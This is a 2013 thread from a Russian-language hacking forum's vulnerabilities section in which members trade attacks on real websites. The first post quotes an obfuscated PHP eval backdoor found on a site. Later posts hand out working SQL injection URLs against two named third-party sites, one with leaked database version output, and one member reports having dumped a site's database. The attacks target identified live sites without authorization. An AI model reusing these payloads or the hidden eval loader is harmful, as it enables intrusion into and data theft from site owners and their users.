HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.05.2013, 17:19
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами: 9030789

Репутация: 704
По умолчанию

Цитата:
Сообщение от blesse  
Наткнулся на
Код:
@preg_replace("\x25\50\x5b\141\x2d\172\x41\55\x5a\60\x2d\71\x2b\75\x20\137\x2d\135\x2b\51\x25\145\x73\151","\x65\166\x61\154\x28\47\x24\153\x79\145\x3d\67\x36\64\x38\70\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x6b\171\x65\75\x37\66\x34\70\x38\73","\x4c\63\x5a\150\x63\151\x39\63\x64\63\x63\166\x64\155\x68\166\x63\63\x52\172\x4c\62\x39\171\x63\62\x4e\157\x62\110\x56\171\x59\62\x67\165\x5a\107\x55\166\x61\110\x52\60\x63\107\x52\166\x59\63\x4d\166\x64\63\x41\164\x59\62\x39\165\x64\107\x56\165\x64\103\x39\61\x63\107\x78\166\x59\127\x52\172\x4c\172\x49\167\x4d\124\x41\166\x4d\104\x55\166\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");
не бэкдор чейто часом?
расшифруй,тянется вот сюда:

orschlurch.de/httpdocs/wp-content/uploads/2010/05/cache/
 
Ответить с цитированием

  #2  
Старый 26.05.2013, 23:52
Facecontrol
Познающий
Регистрация: 12.03.2012
Сообщений: 40
С нами: 7457366

Репутация: 0
По умолчанию

А что за уязвимость такая есть Active script?В гугле искал ничего не нашёл.
 
Ответить с цитированием

  #3  
Старый 27.05.2013, 01:36
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Facecontrol  
А что за уязвимость такая есть Active script?В гугле искал ничего не нашёл.
http://en.wikipedia.org/wiki/Active_Scripting
 
Ответить с цитированием

  #4  
Старый 29.05.2013, 08:08
MaxFast
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами: 7676246

Репутация: 94


По умолчанию

Такая проблема. Нужно провести инъекцию, но есть одна сложность.

Когда происходит ошибка в скрипте, то происходит редирект на главную.

Я точно уверен, что там есть инъекция, но раскрутить не могу.

Код:
_ttp://clubpodium.ru/delog/cookies.php
Уязвим POST параметр poll_id.

Меня постоянно редиректит на главную, я даже результат запроса просмотреть не могу.

Кто поможет?
 
Ответить с цитированием

  #5  
Старый 29.05.2013, 13:12
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от MaxFast  
Такая проблема. Нужно провести инъекцию, но есть одна сложность.
Когда происходит ошибка в скрипте, то происходит редирект на главную.
Я точно уверен, что там есть инъекция, но раскрутить не могу.
Код:
_ttp://clubpodium.ru/delog/cookies.php
Уязвим POST параметр
poll_id
.
Меня постоянно редиректит на главную, я даже результат запроса просмотреть не могу.
Кто поможет?
Можно и без POST обойтись

_http://clubpodium.ru/index.php?section=2&id=-320+union+select+1,2,3,version(),5,6+--+
 
Ответить с цитированием

  #6  
Старый 29.05.2013, 15:37
MaxFast
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами: 7676246

Репутация: 94


По умолчанию

Цитата:
Сообщение от er9j6@  
Можно и без POST обойтись
_http://clubpodium.ru/index.php?section=2&id=-320+union+select+1,2,3,version(),5,6+--+
Да в общем-то как провести инъекцию я знаю, мне мешает редирект. Как вот обойти его?
 
Ответить с цитированием

  #7  
Старый 29.05.2013, 17:44
MaxFast
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами: 7676246

Репутация: 94


По умолчанию

Цитата:
Сообщение от OxoTnik  
Браузер опера

Спасибо. Раскрутил. Ничего путного не нашёл в БД.
 
Ответить с цитированием

  #8  
Старый 30.05.2013, 00:08
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами: 9431076

Репутация: 229
По умолчанию

на bitrix какие есть path disclosure?
 
Ответить с цитированием

  #9  
Старый 30.05.2013, 03:32
lessmore
Новичок
Регистрация: 09.04.2011
Сообщений: 10
С нами: 7944086

Репутация: 0
По умолчанию

But how?

http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=%bf'%bf"

http://www.knullis.com/out.php?trade=\%27

Thanks!
 
Ответить с цитированием

  #10  
Старый 31.05.2013, 16:46
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от lessmore  
But how?
http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=%bf'%bf"
It's all very simple

_http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=1%22and(select (1)from(select(count(*)),concat((select(version()) from(information_schema.tables)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and%22

Duplicate entry '5.0.95' for key 1 Error no:1062
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.